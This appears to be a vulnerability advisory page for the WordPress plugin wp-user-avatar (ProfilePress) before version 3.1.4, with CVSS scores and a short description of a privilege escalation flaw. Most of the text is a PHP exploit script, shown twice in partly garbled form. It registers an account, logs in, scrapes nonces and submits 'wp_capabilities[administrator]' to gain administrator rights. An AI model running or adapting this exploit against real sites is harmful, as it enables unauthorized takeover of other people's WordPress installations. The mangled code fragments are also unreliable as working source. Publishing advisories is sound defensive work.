8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
The user profile update functionality of the plugin allowed arbitrary user meta to be supplied, including wp_capabilities, during a profile update which made it possible for users to escalate their privileges to that of an an administrator.
‘Hax0r3’, ‘reg_email’ => ‘[email protected]’, ‘reg_password’ => ‘password’, ‘reg_password_present’ => ‘true’, ‘reg_first_name’ => ‘Hax0r3’, ‘reg_last_name’ => ‘hack’, ‘action’ => ‘pp_ajax_signup’, ‘melange_id’ => ‘’, ]); $output = curl_exec($ch); curl_close($ch); print_r($output); echo “Log in as newly created user”; $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), ‘cookiejar-’); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘pp_ajax_login’, ‘data’ => ‘login_username=hax0r3&login;_password=password’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); //Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/account/edit-profile/’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); //Nonce preg_match(‘/“nonce”:“([^”]+)"/’, $content, $matches); $nonce = $matches[1]; preg_match(‘/value=“Save Changes”> ‘Hax0r3’, ‘eup_email’ => ‘[email protected]’, ‘eup_first_name’ => ‘Hax0r3’, ‘eup_nickname’ => ‘Hax0r’, ‘eup_display_name’ => ‘Hax0r’, ‘eup_last_name’ => ‘hack’, ‘_wpnonce’ => $wpnonce, ‘nonce’ => $nonce, ‘ppmyac_form_action’ => ‘updateProfile’, ‘action’ => ‘pp_ajax_editprofile’, ‘is_melange’ => ‘true’, ‘wp_capabilities[administrator]’ => ‘1’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?> or ‘Hax0r3’, ‘reg_email’ => ‘[email protected]’, ‘reg_password’ => ‘password’, ‘reg_password_present’ => ‘true’, ‘reg_first_name’ => ‘Hax0r3’, ‘reg_last_name’ => ‘hack’, ‘action’ => ‘pp_ajax_signup’, ‘melange_id’ => ‘’, ]); $output = curl_exec($ch); curl_close($ch); print_r($output); echo “Log in as newly created user”; $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), ‘cookiejar-’); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘pp_ajax_login’, ‘data’ => ‘login_username=hax0r3&login;_password=password’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); //Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/account/edit-profile/’); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); //Nonce preg_match(’/“nonce”:“([^”]+)"/‘, $content, $matches); $nonce = $matches[1]; preg_match(’/value=“Save Changes”> ‘Hax0r3’, ‘eup_email’ => ‘[email protected]’, ‘eup_first_name’ => ‘Hax0r3’, ‘eup_nickname’ => ‘Hax0r’, ‘eup_display_name’ => ‘Hax0r’, ‘eup_last_name’ => ‘hack’, ‘_wpnonce’ => $wpnonce, ‘nonce’ => $nonce, ‘ppmyac_form_action’ => ‘updateProfile’, ‘eup_submit’ => ‘1’, ‘is_melange’ => ‘true’, ‘wp_capabilities[administrator]’ => ‘1’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
CPE | Name | Operator | Version |
---|---|---|---|
wp-user-avatar | lt | 3.1.4 |
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P